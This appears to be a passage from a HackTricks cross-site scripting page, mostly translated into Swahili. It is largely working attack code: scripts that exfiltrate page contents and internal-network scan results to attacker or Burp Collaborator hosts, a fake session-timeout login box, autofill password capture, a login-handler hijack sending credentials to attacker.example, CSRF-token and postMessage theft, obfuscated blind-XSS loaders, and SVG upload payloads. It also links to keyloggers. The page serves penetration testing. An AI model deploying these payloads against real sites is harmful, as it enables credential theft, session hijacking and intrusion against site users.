var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8"
var attacker = "http://10.10.14.8/exfil"
var xhr = new XMLHttpRequest()
xhr.onreadystatechange = function () {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open("GET", url, true)
xhr.send(null)

Pata anwani za IP za ndani

html

<script>
var q = []
var collaboratorURL =
"http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net"
var wait = 2000
var n_threads = 51

// Prepare the fetchUrl functions to access all the possible
for (i = 1; i <= 255; i++) {
q.push(
(function (url) {
return function () {
fetchUrl(url, wait)
}
})("http://192.168.0." + i + ":8080")
)
}

// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for (i = 1; i <= n_threads; i++) {
if (q.length) q.shift()()
}

function fetchUrl(url, wait) {
console.log(url)
var controller = new AbortController(),
signal = controller.signal
fetch(url, { signal })
.then((r) =>
r.text().then((text) => {
location =
collaboratorURL +
"?ip=" +
url.replace(/^http:\/\//, "") +
"&code=" +
encodeURIComponent(text) +
"&" +
Date.now()
})
)
.catch((e) => {
if (!String(e).includes("The user aborted a request") && q.length) {
q.shift()()
}
})

setTimeout((x) => {
controller.abort()
if (q.length) {
q.shift()()
}
}, wait)
}
</script>

Port Scanner (fetch)

javascript

const checkPort = (port) => { fetch(http://localhost:${port}, { mode: "no-cors" }).then(() => { let img = document.createElement("img"); img.src = http://attacker.com/ping?port=${port}; }); } for(let i=0; i<1000; i++) { checkPort(i); }

Port Scanner (websockets)

python

var ports = [80, 443, 445, 554, 3306, 3690, 1234];
for(var i=0; i<ports.length; i++) {
var s = new WebSocket("wss://192.168.1.1:" + ports[i]);
s.start = performance.now();
s.port = ports[i];
s.onerror = function() {
console.log("Port " + this.port + ": " + (performance.now() -this.start) + " ms");
};
s.onopen = function() {
console.log("Port " + this.port+ ": " + (performance.now() -this.start) + " ms");
};
}

Nyakati fupi zinaonyesha bandari inayojibu Nyakati ndefu zinaonyesha hakuna jibu.

Kagua orodha ya bandari zilizozuiwa katika Chrome here na katika Firefox here.

Sanduku la kuomba maelezo ya kuingia

html

<style>::placeholder { color:white; }</style><script>document.write("<div style='position:absolute;top:100px;left:250px;width:400px;background-color:white;height:230px;padding:15px;border-radius:10px;color:black'><form action='https://example.com/'><p>Your sesion has timed out, please login again:</p><input style='width:100%;' type='text' placeholder='Username' /><input style='width: 100%' type='password' placeholder='Password'/><input type='submit' value='Login'></form><p><i>This login box is presented using XSS as a proof-of-concept</i></p></div>")</script>

Kukamata Auto-fill passwords

javascript

<b>Username:</><br>
<input name=username id=username>
<b>Password:</><br>
<input type=password name=password onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">

When any data is introduced in the password field, the username and password is sent to the attackers server, even if the client selects a saved password and don't write anything the credentials will be ex-filtrated.

Hijack form handlers to exfiltrate credentials (const shadowing)

Ikiwa handler muhimu (mfano, function DoLogin(){...}) inatangazwa baadaye kwenye ukurasa, na payload yako inaendesha mapema (mfano, via an inline JS-in-JS sink), fafanua const yenye jina sawa kwanza ili kuzuia na kufunga handler. Taarifa za function zinazotangazwa baadaye haziwezi rebind jina la const, zikiacha hook yako ikiwa ndani ya udhibiti:

javascript

const DoLogin = () => {
const pwd  = Trim(FormInput.InputPassword.value);
const user = Trim(FormInput.InputUtente.value);
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd));
};

Vidokezo

Hii inategemea mpangilio wa utekelezaji: injection yako lazima itekelezwe kabla ya tamko halali.
Ikiwa payload yako imefungwa ndani ya eval(...), bindings za const/let hazitakuwa globals. Tumia dynamic <script> injection technique kutoka sehemu “Deliverable payloads with eval(atob()) and scope nuances” ili kuhakikisha binding halisi, ya global na isiyoweza kurebind.
Wakati vichujio vya maneno muhimu vinazuia code, changanya na Unicode-escaped identifiers au utoaji kwa eval(atob('...')), kama ilivyoonyeshwa hapo juu.

Keylogger

Nilipotafuta tu kwenye github nilipata kadhaa tofauti:

https://github.com/JohnHoder/Javascript-Keylogger
https://github.com/rajeshmajumdar/keylogger
https://github.com/hakanonymos/JavascriptKeylogger
Unaweza pia kutumia metasploit http_javascript_keylogger

Stealing CSRF tokens

javascript

<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>

Kuuibia ujumbe za PostMessage

html

<img src="https://attacker.com/?" id=message>
<script>
window.onmessage = function(e){
document.getElementById("message").src += "&"+e.data;
</script>

html

"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>

<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>

<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">

<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>

<!-- html5sec -  allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags  -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!--  html5sec - eventhandler -  element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known.  -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">

<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>

<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload&#61;&#61; onerror=eval(atob(this.id))>

<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload&#61;&#61; autofocus>

<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">

<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

<!-- Payloads from https://www.intigriti.com/researchers/blog/hacking-tools/hunting-for-blind-cross-site-scripting-xss-vulnerabilities-a-complete-guide -->
<!-- Image tag -->
'"><img src="x" onerror="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- Input tag with autofocus -->
'"><input autofocus onfocus="eval(atob(this.id))" id="Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==">

<!-- In case jQuery is loaded, we can make use of the getScript method -->
'"><script>$.getScript("{SERVER}/script.js")</script>

<!-- Make use of the JavaScript protocol (applicable in cases where your input lands into the "href" attribute or a specific DOM sink) -->
javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4LnNyYz0ne1NFUlZFUn0vc2NyaXB0LmpzJztkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw=="))

<!-- Render an iframe to validate your injection point and receive a callback -->
'"><iframe src="{SERVER}"></iframe>

<!-- Bypass certain Content Security Policy (CSP) restrictions with a base tag -->
<base href="{SERVER}" />

<!-- Make use of the meta-tag to initiate a redirect -->
<meta http-equiv="refresh" content="0; url={SERVER}" />

<!-- In case your target makes use of AngularJS -->
{{constructor.constructor("import('{SERVER}/script.js')")()}}

Regex - Kufikia Maudhui Yaliyofichwa

Kutoka kwenye this writeup inawezekana kujifunza kwamba hata kama baadhi ya thamani zinapofutika kwenye JS, bado inawezekana kuzipata katika JS attributes ndani ya objects mbalimbali. Kwa mfano, input ya REGEX bado inawezekana kuipata hata baada ya thamani ya input ya regex kuondolewa:

javascript

// Do regex with flag
flag = "CTF{FLAG}"
re = /./g
re.test(flag)

// Remove flag value, nobody will be able to get it, right?
flag = ""

// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(
document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"]
)

Brute-Force List

Auto_Wordlists/wordlists/xss.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

XSS ikitumia udhaifu nyingine

XSS katika Markdown

Je, unaweza kuingiza code ya Markdown ambayo itarenderiwa? Labda unaweza kupata XSS! Angalia:

XSS in Markdown

XSS kwa SSRF

Umepata XSS kwenye tovuti inayotumia caching? Jaribu kuibadilisha kuwa SSRF kwa kutumia Edge Side Include Injection na payload hii:

python

<esi:include src="http://yoursite.com/capture" />

Tumia hii kupitisha vikwazo vya cookie, vichujio vya XSS na mengi zaidi!
Taarifa zaidi kuhusu mbinu hii hapa: XSLT.

XSS katika PDF zinazoundwa kwa njia dinamiki

Iwapo ukurasa wa wavuti unaunda PDF kwa kutumia input inayodhibitiwa na mtumiaji, unaweza kujaribu kudanganya bot inayounda PDF ili ianze kutekeleza msimbo wowote wa JS.
Hivyo, ikiwa bot ya muundaji wa PDF inakuta aina fulani ya HTML tags, itayatafsiri, na unaweza kutumia tabia hii kusababisha Server XSS.

Server Side XSS (Dynamic PDF)

Ikiwa huwezi kuingiza HTML tags inaweza kuwa vyema kujaribu kuingiza data za PDF:

PDF Injection

XSS in Amp4Email

AMP, iliyolenga kuharakisha utendaji wa kurasa za wavuti kwenye vifaa vya rununu, inajumuisha HTML tags zilizoambatanishwa na JavaScript ili kuhakikisha utendakazi huku ikisisitiza kasi na usalama. Inaunga mkono safu ya components kwa vipengele mbalimbali, vinavyopatikana kupitia AMP components.

The AMP for Email format extends specific AMP components to emails, enabling recipients to interact with content directly within their emails.

Example writeup XSS in Amp4Email in Gmail.

XSS uploading files (svg)

Pakia kama picha faili kama ifuatayo (kutoka http://ghostlulz.com/xss-svg/):

html

Content-Type: multipart/form-data; boundary=---------------------------232181429808
Content-Length: 574
-----------------------------232181429808
Content-Disposition: form-data; name="img"; filename="img.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert(1);
</script>
</svg>
-----------------------------232181429808--

html

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">alert("XSS")</script>
</svg>

html

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("XSS");
</script>
</svg>

svg

<svg width="500" height="500"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>

<foreignObject width="500" height="500">
<iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html,&lt;body&gt;&lt;script&gt;document.body.style.background=&quot;red&quot;&lt;/script&gt;hi&lt;/body&gt;" width="400" height="250"/>
<iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:document.write('hi');" width="400" height="250"/>
</foreignObject>
</svg>

html

<svg><use href="//portswigger-labs.net/use_element/upload.php#x" /></svg>

xml

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg' &gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />

Pata zaidi SVG payloads katika https://github.com/allanlw/svg-cheatsheet

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.